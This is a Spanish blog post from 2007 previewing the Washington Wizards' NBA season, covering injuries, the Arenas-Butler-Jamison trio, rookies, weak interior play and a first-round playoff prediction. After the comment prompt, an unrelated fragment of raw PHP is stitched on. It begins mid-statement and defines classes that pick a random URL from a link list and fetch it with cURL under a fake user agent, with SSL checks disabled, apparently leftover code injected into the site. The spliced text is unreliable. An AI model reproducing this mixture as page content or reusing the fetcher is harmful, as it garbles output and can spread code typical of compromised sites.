Washington Wizards: la salud es lo que importa

19 de November de 2007 por Gallis

Hay equipos con un dueño más o menos propenso a gastarse el dinero, sobrepasando el límite salarial y/o pagando el impuesto de lujo. Hay equipos más o menos atractivos, hay mercados más o menos poderosos… Hay múltiples factores que pueden determinar que el futuro de una franquicia sea más o menos brillante. Pero si hay algo que es igual para los 30 equipos es que todos están expuestos a lesiones inoportunas que arruinen el trabajo de toda una temporada. El año pasado el máximo exponente de esta mala suerte fueron los Washington Wizards. Las lesiones de Butler primero y de Arenas después dejaron a Jamison solo ante el peligro, o mejor dicho, solo ante Lebron. Vista la trayectoria posterior de los Cavs, podría pensarse que el resultado de esa primera ronda habría sido similar, pero en la capital estadounidense siempre tendrán esa duda.

El caso es que el pasado, pasado está, y el futuro de los capitalinos alberga más sombras que luces. En el verano de 2005 los Wizards se hicieron con los servicios de Caron Butler, quien junto a Arenas y Jamison formaron uno de los tríos más poderosos del Este, junto al de los Nets (ahora eclipsados ambos por el Big Three de los Celtics). Sin embargo, este proyecto lleva dos años fracasando en la primera ronda de Playoffs (ambas ante los muchachos de Lebron) y un tercer fracaso podría poner punto y final a esta aventura. Arenas y Jamison acaban contrato y es difícil pensar que renueven sus contratos si la fórmula sigue sin funcionar. El Agente Zero ya ha anunciado su intención de salir al mercado en verano, y novias no le faltarán.

Y no parece que en las oficinas de los Wizards anden muy preocupados, porque los únicos refuerzos con los que Eddie Jordan va a poder contar este año han llegado vía draft. Nick Young, Oleksiy Pecherov (que estará 6 semanas de baja) y Dominic McGuire son las caras nuevas del equipo. Los dos primeros, si las lesiones les respetan, deberán aportar algo conforme avance la temporada. Young, procedente de USC, puede ser un aporte importante para el juego exterior. En el puesto de escolta Stevenson no ha dado pruebas de ser un titular fiable y si Young se aclimata bien no sería difícil que le quitara minutos. Así, además, Daniels no tendría que repartir sus minutos entre suplente de Arenas y el puesto de escolta.

Un año más, el juego interior será el punto débil del equipo. Haywood, Thomas, Songaila, amén del ya mencionado Pecherov son todo lo que los Wizards cuentan para la pintura. Se antoja demasiado poco, vistos los refuerzos de algunos rivales directos. Como muestra un par de botones: el año pasado Antawn Jamison fue el máximo reboteador del equipo, con 8 capturas por partido. Es más, Butler también promedió más rebotes que los pívots del equipo. Mientras, tan sólo 2 jugadores, Haywood y Thomas, promediaron más de un tapón por partido, pero ninguno de los dos llegó a 1.5 de media.

wizardsreadytotulePese a todo, Arenas, Butler y Jamison son un arsenal del que muy pocos equipos pueden presumir. Jugadores capaces de anotar por encima de los 20 puntos con regularidad y asumir más protagonismo en un mal día de un compañero, aportando además rebotes, defensa y experiencia. Mención especial merece el Agente Zero. En sus últimas 3 temporadas ha promediado más de 25 puntos y 5 asistencias. Además, el año pasado fue el único capaz de rivalizar con Kobe Bryant en exhibiciones anotadoras. Mientras, Jamison volverá a ser un fiel escudero, aunque haya comenzado a apuntar un ligero declive. En los pasados Playoffs demostró que todavía se puede contar con él para grandes cosas (32 puntos y 9.8 rebotes de media son un magnífico aval). Butler seguirá creciendo siempre que las lesiones le respeten y no sería de extrañar que se convirtiera en un fijo del All-Star. Si a eso le unimos las ganas que todos los miembros de esta tripleta de lujo tendrán de revancha, para demostrar lo que pudo ser y no fue en la pasada temporada, podría decirse que los Wizards serán un animal herido, al que muy pocos querrán encontrarse en esa primera ronda de Playoffs, si es que se clasifican.

Quinteto inicial: Arenas, Stevenson, Butler, Jamison y Haywood.

Sexto hombre: Songaila.

Predicción: Primera ronda de Playoffs.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>